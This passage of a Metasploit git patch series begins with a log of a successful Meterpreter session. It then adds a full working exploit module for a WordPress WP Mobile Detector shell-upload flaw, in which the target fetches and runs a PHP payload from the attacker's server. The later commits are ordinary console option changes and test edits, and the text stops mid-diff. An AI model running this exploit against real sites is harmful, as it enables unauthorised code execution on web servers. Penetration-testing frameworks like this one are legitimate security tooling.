http://1.1.1.1:8080/ZWTgqwsiFL.php + [*] Uploading payload via /wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src=http://1.1.1.1:8080/ZWTgqwsiFL.php + [+] Payload requested on server, sending + [+] Sleeping 5 seconds for payload upload + [*] Executing the payload via /wordpress/wp-content/plugins/wp-mobile-detector/cache/ZWTgqwsiFL.php + [*] Sending stage (37514 bytes) to 2.2.2.2 + [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:47064) at 2017-10-20 22:54:04 -0400 + [+] Deleted ZWTgqwsiFL.php + [*] Server stopped. + ``` + diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb new file mode 100644 index 0000000000..ae2f4fa7ad --- /dev/null +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -0,0 +1,118 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress WP Mobile Detector 3.5 Shell Upload', + 'Description' => %q{ + WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker + to execute arbitrary PHP code. This flaw exists because the + /wp-content/plugins/wp-mobile-detector/resize.php script does contains a + remote file include for files not cached by the system already. + By uploading a .php file, the remote system will + place the file in a user-accessible path. Making a direct request to the + uploaded file will allow the attacker to execute the script with the privileges + of the web server. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'pluginvulnerabilities.com', # Vulnerability disclosure + 'Aaditya Purani', # EDB module discovered after writing module + 'h00die' # Metasploit module + ], + 'References' => + [ + ['WPVDB', '8505'], + ['EDB', '39891'], + ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'] + ], + 'DisclosureDate' => 'May 31 2016', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wp-mobile-detectory < 3.6', {}]], + 'DefaultTarget' => 0 + )) + end + + def check + check_plugin_version_from_readme('wp-mobile-detector', '3.5') + end + + def exploit + if datastore['SRVHOST'] == '0.0.0.0' + fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from rhost') + end + payload_name = rand_text_alphanumeric(10) + '.php' + + # First check to see if the file is written already, if it is cache wont retrieve it from us + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/' + ) + if res and !res.body.include?(payload_name) + vprint_status("#{payload_name} verified as not written.") + else + fail_with(Failure::BadConfig,"#{payload_name} already written on system.") + end + + def on_request_uri(cli, _request) + print_good('Payload requested on server, sending') + send_response(cli, payload.encoded, {}) + end + + print_status('Starting Payload Server') + payload_url = '/' + payload_name + start_service('Uri' => { + 'Path' => payload_url, + 'Proc' => proc do |cli, req| + on_request_uri(cli, req) + end + }) + + payload_full_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + payload_url + print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{payload_full_url}") + + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'), + 'vars_get' => {'src' => payload_full_url} + ) + + if res && res.code == 200 + print_good('Sleeping 5 seconds for payload upload') + register_files_for_cleanup(payload_name) + + select(nil,nil,nil,5) + + print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}") + send_request_cgi( + { + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name), + }) + # wait for callback, without this we exit too fast and miss our shell + select(nil,nil,nil,2) + handler + else + if res.nil? + fail_with(Failure::Unreachable, 'No response from the target') + else + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") + fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') + end + end + end +end From ea1ac3d5b3737b60b33769d543a28e10bb2d7b0b Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 20:39:38 -0700 Subject: [PATCH 030/254] #9108: added -C option to change default hosts columns The -C option saves the column list the user provided and uses that as the default column list until msfconsole is restarted --- lib/msf/ui/console/command_dispatcher/db.rb | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index e37a16a350..74f2cf3f17 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -354,6 +354,8 @@ class Db end end + @@hosts_columns = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments'] + def cmd_hosts(*args) return unless active? ::ActiveRecord::Base.connection_pool.with_connection { @@ -371,7 +373,7 @@ class Db default_columns << 'tags' # Special case virtual_columns = [ 'svcs', 'vulns', 'workspace', 'tags' ] - col_search = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments'] + col_search = @@hosts_columns default_columns.delete_if {|v| (v[-2,2] == "id")} while (arg = args.shift) @@ -380,7 +382,7 @@ class Db mode << :add when '-d','--delete' mode << :delete - when '-c' + when '-c','-C' list = args.shift if(!list) print_error("Invalid column list") @@ -394,6 +396,10 @@ class Db return end } + if (arg == '-C') + @@hosts_columns = col_search + end + when '-u','--up' onlyup = true when '-o' @@ -426,6 +432,7 @@ class Db print_line " -a,--add Add the hosts instead of searching" print_line " -d,--delete Delete the hosts instead of searching" print_line " -c Only show the given columns (see list below)" + print_line " -C Only show the given columns until next restart (see list below)" print_line " -h,--help Show this help information" print_line " -u,--up Only show hosts which are up" print_line " -o Send output to a file in csv format" From 8d035ccd401fdc257ce20f47fa8f224035345178 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:10:56 -0700 Subject: [PATCH 031/254] #9108: fixed broken unit test --- db_spec.rb | 389 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 389 insertions(+) create mode 100644 db_spec.rb diff --git a/db_spec.rb b/db_spec.rb new file mode 100644 index 0000000000..7bccc9b9cc --- /dev/null +++ b/db_spec.rb @@ -0,0 +1,389 @@ +require 'spec_helper' + +require 'msf/ui' +require 'msf/ui/console/command_dispatcher/db' + +RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do + include_context 'Msf::DBManager' + include_context 'Msf::UIDriver' + + subject(:db) do + described_class.new(driver) + end + + it { is_expected.to respond_to :active? } + it { is_expected.to respond_to :arg_host_range } + it { is_expected.to respond_to :arg_port_range } + it { is_expected.to respond_to :cmd_db_autopwn } + it { is_expected.to respond_to :cmd_db_autopwn_help } + it { is_expected.to respond_to :cmd_db_connect } + it { is_expected.to respond_to :cmd_db_connect_help } + it { is_expected.to respond_to :cmd_db_disconnect } + it { is_expected.to respond_to :cmd_db_disconnect_help } + it { is_expected.to respond_to :cmd_db_driver } + it { is_expected.to respond_to :cmd_db_driver_help } + it { is_expected.to respond_to :cmd_db_export_help } + it { is_expected.to respond_to :cmd_db_hosts_help } + it { is_expected.to respond_to :cmd_db_import_help } + it { is_expected.to respond_to :cmd_db_import_tabs } + it { is_expected.to respond_to :cmd_db_nmap } + it { is_expected.to respond_to :cmd_db_notes } + it { is_expected.to respond_to :cmd_db_notes_help } + it { is_expected.to respond_to :cmd_db_rebuild_cache } + it { is_expected.to respond_to :cmd_db_rebuild_cache_help } + it { is_expected.to respond_to :cmd_db_services } + it { is_expected.to respond_to :cmd_db_services_help } + it { is_expected.to respond_to :cmd_db_status } + it { is_expected.to respond_to :cmd_db_vulns } + it { is_expected.to respond_to :cmd_db_vulns_help } + it { is_expected.to respond_to :cmd_hosts } + it { is_expected.to respond_to :cmd_hosts_help } + it { is_expected.to respond_to :cmd_loot_help } + it { is_expected.to respond_to :cmd_notes_help } + it { is_expected.to respond_to :cmd_services_help } + it { is_expected.to respond_to :cmd_vulns_help } + it { is_expected.to respond_to :cmd_workspace_help } + it { is_expected.to respond_to :cmd_workspace_tabs } + it { is_expected.to respond_to :commands } + it { is_expected.to respond_to :db_check_driver } + it { is_expected.to respond_to :db_connect_postgresql } + it { is_expected.to respond_to :db_find_tools } + it { is_expected.to respond_to :db_parse_db_uri_postgresql } + it { is_expected.to respond_to :deprecated_commands } + it { is_expected.to respond_to :each_host_range_chunk } + it { is_expected.to respond_to :make_sortable } + it { is_expected.to respond_to :name } + it { is_expected.to respond_to :set_rhosts_from_addrs } + + describe "#cmd_db_export" do + describe "-h" do + it "should show a help message" do + db.cmd_db_export "-h" + expect(@output).to match_array [ + "Usage:", + " db_export -f [filename]", + " Format can be one of: xml, pwdump" + ] + end + end + end + + describe "#cmd_db_import" do + describe "-h" do + it "should show a help message" do + db.cmd_db_import "-h" + expect(@output).to match_array [ + "Usage: db_import [file2...]", + "Filenames can be globs like *.xml, or **/*.xml which will search recursively", + "Currently supported file types include:", + " Acunetix", + " Amap Log", + " Amap Log -m", + " Appscan", + " Burp Issue XML", + " Burp Session XML", + " CI", + " Foundstone", + " FusionVM XML", + " IP Address List", + " IP360 ASPL", + " IP360 XML v3", + " Libpcap Packet Capture", + " Masscan XML", + " Metasploit PWDump Export", + " Metasploit XML", + " Metasploit Zip Export", + " Microsoft Baseline Security Analyzer", + " NeXpose Simple XML", + " NeXpose XML Report", + " Nessus NBE Report", + " Nessus XML (v1)", + " Nessus XML (v2)", + " NetSparker XML", + " Nikto XML", + " Nmap XML", + " OpenVAS Report", + " OpenVAS XML", + " Outpost24 XML", + " Qualys Asset XML", + " Qualys Scan XML", + " Retina XML", + " Spiceworks CSV Export", + " Wapiti XML" + ] + end + end + end + + describe "#cmd_hosts" do + describe "-h" do + it "should show a help message" do + db.cmd_hosts "-h" + expect(@output).to match_array [ + "Usage: hosts [ options ] [addr1 addr2 ...]", + "OPTIONS:", + " -a,--add Add the hosts instead of searching", + " -d,--delete Delete the hosts instead of searching", + " -c Only show the given columns (see list below)", + " -C Only show the given columns until the next restart (see list below)", + " -h,--help Show this help information", + " -u,--up Only show hosts which are up", + " -o Send output to a file in csv format", + " -O Order rows by specified column number", + " -R,--rhosts Set RHOSTS from the results of the search", + " -S,--search Search string to filter by", + " -i,--info Change the info of a host", + " -n,--name Change the name of a host", + " -m,--comment Change the comment of a host", + " -t,--tag Add or specify a tag to a range of hosts", + "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags" + ] + end + end + end + + describe "#cmd_loot" do + describe "-h" do + it "should show a help message" do + db.cmd_loot "-h" + expect(@output).to match_array [ + "Usage: loot ", + " Info: loot [-h] [addr1 addr2 ...] [-t ]", + " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]", + " Del: loot -d [addr1 addr2 ...]", + " -a,--add Add loot to the list of addresses, instead of listing", + " -d,--delete Delete *all* loot matching host and type", + " -f,--file File with contents of the loot to add", + " -i,--info Info of the loot to add", + " -t Search for a list of types", + " -h,--help Show this help information", + " -S,--search Search string to filter by" + ] + end + end + + end + + describe "#cmd_notes" do + describe "-h" do + it "should show a help message" do + db.cmd_notes "-h" + expect(@output).to match_array [ + "Usage: notes [-h] [-t ] [-n ] [-a] [addr range]", + " -a,--add Add a note to the list of addresses, instead of listing", + " -d,--delete Delete the hosts instead of searching", + " -n,--note Set the data for a new note (only with -a)", + " -t Search for a list of types", + " -h,--help Show this help information", + " -R,--rhosts Set RHOSTS from the results of the search", + " -S,--search Regular expression to match for search", + " -o,--output Save the notes to a csv file", + " --sort Fields to sort by (case sensitive)", + "Examples:", + " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41", + " notes -t smb.fingerprint 10.1.1.34 10.1.20.41", + " notes -S 'nmap.nse.(http|rtsp)' --sort type,output" + ] + + end + end + + end + + describe "#cmd_services" do + describe "-h" do + it "should show a help message" do + db.cmd_services "-h" + expect(@output).to match_array [ + "Usage: services [-h] [-u] [-a] [-r ] [-p ] [-s ] [-o ] [addr1 addr2 ...]", + " -a,--add Add the services instead of searching", + " -d,--delete Delete the services instead of searching", + " -c Only show the given columns", + " -h,--help Show this help information", + " -s Search for a list of service names", + " -p Search for a list of ports", + " -r Only show [tcp|udp] services", + " -u,--up Only show services which are up", + " -o Send output to a file in csv format", + " -O Order rows by specified column number", + " -R,--rhosts Set RHOSTS from the results of the search", + " -S,--search Search string to filter by", + "Available columns: created_at, info, name, port, proto, state, updated_at" + ] + end + end + describe "-p" do + before(:example) do + host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") + FactoryGirl.create(:mdm_service, :host => host, :port => 1024, name: 'Service1', proto: 'udp') + FactoryGirl.create(:mdm_service, :host => host, :port => 1025, name: 'Service2', proto: 'tcp') + FactoryGirl.create(:mdm_service, :host => host, :port => 1026, name: 'Service3', proto: 'udp') + end + it "should list services that are on a given port" do + db.cmd_services "-p", "1024,1025" + expect(@output).to match_array [ + "Services", + "========", + "", + "host port proto name state info", + "---- ---- ----- ---- ----- ----", + "192.168.0.1 1024 udp Service1 open ", + "192.168.0.1 1025 tcp Service2 open " + ] + end + end + describe "-np" do + before(:example) do + host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") + FactoryGirl.create(:mdm_service, :host => host, :port => 1024) + FactoryGirl.create(:mdm_service, :host => host, :port => 1025) + FactoryGirl.create(:mdm_service, :host => host, :port => 1026) + end + it "should list services that are not on a given port" do + skip { + db.cmd_services "-np", "1024" + + expect(@output).to =~ [ + "Services", + "========", + "", + "host port proto name state info", + "---- ---- ----- ---- ----- ----", + "192.168.0.1 1025 snmp open ", + "192.168.0.1 1026 snmp open " + ] + } + end + end + end + + describe "#cmd_vulns" do + describe "-h" do + it "should show a help message" do + db.cmd_vulns "-h" + expect(@output).to match_array [ + "Print all vulnerabilities in the database", + "Usage: vulns [addr range]", + " -h,--help Show this help information", + " -p,--port List vulns matching this port spec", + " -s List vulns matching these service names", + " -R,--rhosts Set RHOSTS from the results of the search", + " -S,--search Search string to filter by", + " -i,--info Display Vuln Info", + "Examples:", + " vulns -p 1-65536 # only vulns with associated services", + " vulns -p 1-65536 -s http # identified as http on any port" + ] + end + end + + end + + describe "#cmd_workspace" do + before(:example) do + db.cmd_workspace "-D" + @output = [] + end + + describe "" do + it "should list default workspace" do + db.cmd_workspace + expect(@output).to match_array [ + "%red* default%clr" + ] + end + + it "should list all workspaces" do + db.cmd_workspace("-a", "foo") + @output = [] + db.cmd_workspace + expect(@output).to match_array [ + " default", + "%red* foo%clr" + ] + end + end + + describe "-v" do + it "should list default workspace verbosely" do + db.cmd_workspace("-v") + expect(@output).to match_array [ + "", + "Workspaces", + "==========", + "current name hosts services vulns creds loots notes", + "------- ---- ----- -------- ----- ----- ----- -----", + "* default 0 0 0 0 0 0" + ] + end + + it "should list all workspaces verbosely" do + db.cmd_workspace("-a", "foo") + @output = [] + db.cmd_workspace("-v") + expect(@output).to match_array [ + "", + "Workspaces", + "==========", + "current name hosts services vulns creds loots notes", + "------- ---- ----- -------- ----- ----- ----- -----", + " default 0 0 0 0 0 0", + "* foo 0 0 0 0 0 0" + ] + end + end + + describe "-a" do + it "should add workspaces" do + db.cmd_workspace("-a", "foo", "bar", "baf") + expect(@output).to match_array [ + "Added workspace: foo", + "Added workspace: bar", + "Added workspace: baf" + ] + end + end + + describe "-d" do + it "should delete a workspace" do + db.cmd_workspace("-a", "foo") + @output = [] + db.cmd_workspace("-d", "foo") + expect(@output).to match_array [ + "Deleted workspace: foo", + "Switched workspace: default" + ] + end + end + + describe "-D" do + it "should delete all workspaces" do + db.cmd_workspace("-a", "foo") + @output = [] + db.cmd_workspace("-D") + expect(@output).to match_array [ + "Deleted and recreated the default workspace", + "Deleted workspace: foo", + "Switched workspace: default" + ] + end + end + + describe "-h" do + it "should show a help message" do + db.cmd_workspace "-h" + expect(@output).to match_array [ + "Usage:", + " workspace List workspaces", + " workspace -v List workspaces verbosely", + " workspace [name] Switch workspace", + " workspace -a [name] ... Add workspace(s)", + " workspace -d [name] ... Delete workspace(s)", + " workspace -D Delete all workspaces", + " workspace -r Rename workspace", + " workspace -h Show this help information" + ] + end + end + end +end From ecada96585066f0e74f7ef3c7b24455863e85611 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:20:36 -0700 Subject: [PATCH 032/254] #9108: fixed unit test --- spec/lib/msf/ui/console/command_dispatcher/db_spec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index d62f208a17..7bccc9b9cc 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -125,6 +125,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " -a,--add Add the hosts instead of searching", " -d,--delete Delete the hosts instead of searching", " -c Only show the given columns (see list below)", + " -C Only show the given columns until the next restart (see list below)", " -h,--help Show this help information", " -u,--up Only show hosts which are up", " -o Send output to a file in csv format", From afe067fca54cf35f8585cf7bf99657ebd7955985 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:22:31 -0700 Subject: [PATCH 033/254] commited file to the wrong place --- db_spec.rb | 389 ----------------------------------------------------- 1 file changed, 389 deletions(-) delete mode 100644 db_spec.rb diff --git a/db_spec.rb b/db_spec.rb deleted file mode 100644 index 7bccc9b9cc..0000000000 --- a/db_spec.rb +++ /dev/null @@ -1,389 +0,0 @@ -require 'spec_helper' - -require 'msf/ui' -require 'msf/ui/console/command_dispatcher/db' - -RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do - include_context 'Msf::DBManager' - include_context 'Msf::UIDriver' - - subject(:db) do - described_class.new(driver) - end - - it { is_expected.to respond_to :active? } - it { is_expected.to respond_to :arg_host_range } - it { is_expected.to respond_to :arg_port_range } - it { is_expected.to respond_to :cmd_db_autopwn } - it { is_expected.to respond_to :cmd_db_autopwn_help } - it { is_expected.to respond_to :cmd_db_connect } - it { is_expected.to respond_to :cmd_db_connect_help } - it { is_expected.to respond_to :cmd_db_disconnect } - it { is_expected.to respond_to :cmd_db_disconnect_help } - it { is_expected.to respond_to :cmd_db_driver } - it { is_expected.to respond_to :cmd_db_driver_help } - it { is_expected.to respond_to :cmd_db_export_help } - it { is_expected.to respond_to :cmd_db_hosts_help } - it { is_expected.to respond_to :cmd_db_import_help } - it { is_expected.to respond_to :cmd_db_import_tabs } - it { is_expected.to respond_to :cmd_db_nmap } - it { is_expected.to respond_to :cmd_db_notes } - it { is_expected.to respond_to :cmd_db_notes_help } - it { is_expected.to respond_to :cmd_db_rebuild_cache } - it { is_expected.to respond_to :cmd_db_rebuild_cache_help } - it { is_expected.to respond_to :cmd_db_services } - it { is_expected.to respond_to :cmd_db_services_help } - it { is_expected.to respond_to :cmd_db_status } - it { is_expected.to respond_to :cmd_db_vulns } - it { is_expected.to respond_to :cmd_db_vulns_help } - it { is_expected.to respond_to :cmd_hosts } - it { is_expected.to respond_to :cmd_hosts_help } - it { is_expected.to respond_to :cmd_loot_help } - it { is_expected.to respond_to :cmd_notes_help } - it { is_expected.to respond_to :cmd_services_help } - it { is_expected.to respond_to :cmd_vulns_help } - it { is_expected.to respond_to :cmd_workspace_help } - it { is_expected.to respond_to :cmd_workspace_tabs } - it { is_expected.to respond_to :commands } - it { is_expected.to respond_to :db_check_driver } - it { is_expected.to respond_to :db_connect_postgresql } - it { is_expected.to respond_to :db_find_tools } - it { is_expected.to respond_to :db_parse_db_uri_postgresql } - it { is_expected.to respond_to :deprecated_commands } - it { is_expected.to respond_to :each_host_range_chunk } - it { is_expected.to respond_to :make_sortable } - it { is_expected.to respond_to :name } - it { is_expected.to respond_to :set_rhosts_from_addrs } - - describe "#cmd_db_export" do - describe "-h" do - it "should show a help message" do - db.cmd_db_export "-h" - expect(@output).to match_array [ - "Usage:", - " db_export -f [filename]", - " Format can be one of: xml, pwdump" - ] - end - end - end - - describe "#cmd_db_import" do - describe "-h" do - it "should show a help message" do - db.cmd_db_import "-h" - expect(@output).to match_array [ - "Usage: db_import [file2...]", - "Filenames can be globs like *.xml, or **/*.xml which will search recursively", - "Currently supported file types include:", - " Acunetix", - " Amap Log", - " Amap Log -m", - " Appscan", - " Burp Issue XML", - " Burp Session XML", - " CI", - " Foundstone", - " FusionVM XML", - " IP Address List", - " IP360 ASPL", - " IP360 XML v3", - " Libpcap Packet Capture", - " Masscan XML", - " Metasploit PWDump Export", - " Metasploit XML", - " Metasploit Zip Export", - " Microsoft Baseline Security Analyzer", - " NeXpose Simple XML", - " NeXpose XML Report", - " Nessus NBE Report", - " Nessus XML (v1)", - " Nessus XML (v2)", - " NetSparker XML", - " Nikto XML", - " Nmap XML", - " OpenVAS Report", - " OpenVAS XML", - " Outpost24 XML", - " Qualys Asset XML", - " Qualys Scan XML", - " Retina XML", - " Spiceworks CSV Export", - " Wapiti XML" - ] - end - end - end - - describe "#cmd_hosts" do - describe "-h" do - it "should show a help message" do - db.cmd_hosts "-h" - expect(@output).to match_array [ - "Usage: hosts [ options ] [addr1 addr2 ...]", - "OPTIONS:", - " -a,--add Add the hosts instead of searching", - " -d,--delete Delete the hosts instead of searching", - " -c Only show the given columns (see list below)", - " -C Only show the given columns until the next restart (see list below)", - " -h,--help Show this help information", - " -u,--up Only show hosts which are up", - " -o Send output to a file in csv format", - " -O Order rows by specified column number", - " -R,--rhosts Set RHOSTS from the results of the search", - " -S,--search Search string to filter by", - " -i,--info Change the info of a host", - " -n,--name Change the name of a host", - " -m,--comment Change the comment of a host", - " -t,--tag Add or specify a tag to a range of hosts", - "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags" - ] - end - end - end - - describe "#cmd_loot" do - describe "-h" do - it "should show a help message" do - db.cmd_loot "-h" - expect(@output).to match_array [ - "Usage: loot ", - " Info: loot [-h] [addr1 addr2 ...] [-t ]", - " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]", - " Del: loot -d [addr1 addr2 ...]", - " -a,--add Add loot to the list of addresses, instead of listing", - " -d,--delete Delete *all* loot matching host and type", - " -f,--file File with contents of the loot to add", - " -i,--info Info of the loot to add", - " -t Search for a list of types", - " -h,--help Show this help information", - " -S,--search Search string to filter by" - ] - end - end - - end - - describe "#cmd_notes" do - describe "-h" do - it "should show a help message" do - db.cmd_notes "-h" - expect(@output).to match_array [ - "Usage: notes [-h] [-t ] [-n ] [-a] [addr range]", - " -a,--add Add a note to the list of addresses, instead of listing", - " -d,--delete Delete the hosts instead of searching", - " -n,--note Set the data for a new note (only with -a)", - " -t Search for a list of types", - " -h,--help Show this help information", - " -R,--rhosts Set RHOSTS from the results of the search", - " -S,--search Regular expression to match for search", - " -o,--output Save the notes to a csv file", - " --sort Fields to sort by (case sensitive)", - "Examples:", - " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41", - " notes -t smb.fingerprint 10.1.1.34 10.1.20.41", - " notes -S 'nmap.nse.(http|rtsp)' --sort type,output" - ] - - end - end - - end - - describe "#cmd_services" do - describe "-h" do - it "should show a help message" do - db.cmd_services "-h" - expect(@output).to match_array [ - "Usage: services [-h] [-u] [-a] [-r ] [-p ] [-s ] [-o ] [addr1 addr2 ...]", - " -a,--add Add the services instead of searching", - " -d,--delete Delete the services instead of searching", - " -c Only show the given columns", - " -h,--help Show this help information", - " -s Search for a list of service names", - " -p Search for a list of ports", - " -r Only show [tcp|udp] services", - " -u,--up Only show services which are up", - " -o Send output to a file in csv format", - " -O Order rows by specified column number", - " -R,--rhosts Set RHOSTS from the results of the search", - " -S,--search Search string to filter by", - "Available columns: created_at, info, name, port, proto, state, updated_at" - ] - end - end - describe "-p" do - before(:example) do - host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") - FactoryGirl.create(:mdm_service, :host => host, :port => 1024, name: 'Service1', proto: 'udp') - FactoryGirl.create(:mdm_service, :host => host, :port => 1025, name: 'Service2', proto: 'tcp') - FactoryGirl.create(:mdm_service, :host => host, :port => 1026, name: 'Service3', proto: 'udp') - end - it "should list services that are on a given port" do - db.cmd_services "-p", "1024,1025" - expect(@output).to match_array [ - "Services", - "========", - "", - "host port proto name state info", - "---- ---- ----- ---- ----- ----", - "192.168.0.1 1024 udp Service1 open ", - "192.168.0.1 1025 tcp Service2 open " - ] - end - end - describe "-np" do - before(:example) do - host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") - FactoryGirl.create(:mdm_service, :host => host, :port => 1024) - FactoryGirl.create(:mdm_service, :host => host, :port => 1025) - FactoryGirl.create(:mdm_service, :host => host, :port => 1026) - end - it "should list services that are not on a given port" do - skip { - db.cmd_services "-np", "1024" - - expect(@output).to =~ [ - "Services", - "========", - "", - "host port proto name state info", - "---- ---- ----- ---- ----- ----", - "192.168.0.1 1025 snmp open ", - "192.168.0.1 1026 snmp open " - ] - } - end - end - end - - describe "#cmd_vulns" do - describe "-h" do - it "should show a help message" do - db.cmd_vulns "-h" - expect(@output).to match_array [ - "Print all vulnerabilities in the database", - "Usage: vulns [addr range]", - " -h,--help Show this help information", - " -p,--port List vulns matching this port spec", - " -s List vulns matching these service names", - " -R,--rhosts Set RHOSTS from the results of the search", - " -S,--search Search string to filter by", - " -i,--info Display Vuln Info", - "Examples:", - " vulns -p 1-65536 # only vulns with associated services", - " vulns -p 1-65536 -s http # identified as http on any port" - ] - end - end - - end - - describe "#cmd_workspace" do - before(:example) do - db.cmd_workspace "-D" - @output = [] - end - - describe "" do - it "should list default workspace" do - db.cmd_workspace - expect(@output).to match_array [ - "%red* default%clr" - ] - end - - it "should list all workspaces" do - db.cmd_workspace("-a", "foo") - @output = [] - db.cmd_workspace - expect(@output).to match_array [ - " default", - "%red* foo%clr" - ] - end - end - - describe "-v" do - it "should list default workspace verbosely" do - db.cmd_workspace("-v") - expect(@output).to match_array [ - "", - "Workspaces", - "==========", - "current name hosts services vulns creds loots notes", - "------- ---- ----- -------- ----- ----- ----- -----", - "* default 0 0 0 0 0 0" - ] - end - - it "should list all workspaces verbosely" do - db.cmd_workspace("-a", "foo") - @output = [] - db.cmd_workspace("-v") - expect(@output).to match_array [ - "", - "Workspaces", - "==========", - "current name hosts services vulns creds loots notes", - "------- ---- ----- -------- ----- ----- ----- -----", - " default 0 0 0 0 0 0", - "* foo 0 0 0 0 0 0" - ] - end - end - - describe "-a" do - it "should add workspaces" do - db.cmd_workspace("-a", "foo", "bar", "baf") - expect(@output).to match_array [ - "Added workspace: foo", - "Added workspace: bar", - "Added workspace: baf" - ] - end - end - - describe "-d" do - it "should delete a workspace" do - db.cmd_workspace("-a", "foo") - @output = [] - db.cmd_workspace("-d", "foo") - expect(@output).to match_array [ - "Deleted workspace: foo", - "Switched workspace: default" - ] - end - end - - describe "-D" do - it "should delete all workspaces" do - db.cmd_workspace("-a", "foo") - @output = [] - db.cmd_workspace("-D") - expect(@output).to match_array [ - "Deleted and recreated the default workspace", - "Deleted workspace: foo", - "Switched workspace: default" - ] - end - end - - describe "-h" do - it "should show a help message" do - db.cmd_workspace "-h" - expect(@output).to match_array [ - "Usage:", - " workspace List workspaces", - " workspace -v List workspaces verbosely", - " workspace [name] Switch workspace", - " workspace -a [name] ... Add workspace(s)", - " workspace -d [name] ... Delete workspace(s)", - " workspace -D Delete all workspaces", - " workspace -r Rename workspace", - " workspace -h Show this help information" - ] - end - end - end -end From 636551aa03e4f1490b8633659c76ed69571e6483 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:32:54 -0700 Subject: [PATCH 034/254] Fixed help message to match test --- lib/msf/ui/console/command_dispatcher/db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 74f2cf3f17..f642d096da 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -432,7 +432,7 @@ class Db print_line " -a,--add Add the hosts instead of searching" print_line " -d,--delete Delete the hosts instead of searching" print_line " -c Only show the given columns (see list below)" - print_line " -C Only show the given columns until next restart (see list below)" + print_line " -C Only show the given columns until the next restart (see list below)" print_line " -h,--help Show this help information" print_line " -u,--up Only show hosts which are up" print_line " -o Send output to a file in csv format" From ca4feb51364d0b1051e5548d949bff3f361a30bf Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 5 Sep 2017 23:52:38 +0800 Subject: [PATCH 035/254] fix session upgrading --- lib/msf/ui/console/command_dispatcher/core.rb | 11 +++-------- modules/post/multi/manage/shell_to_meterpreter.rb | 5 ----- 2 files changed, 3 insertions(+), 13 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 0cbc9416f5..675538ae61 100644 --- 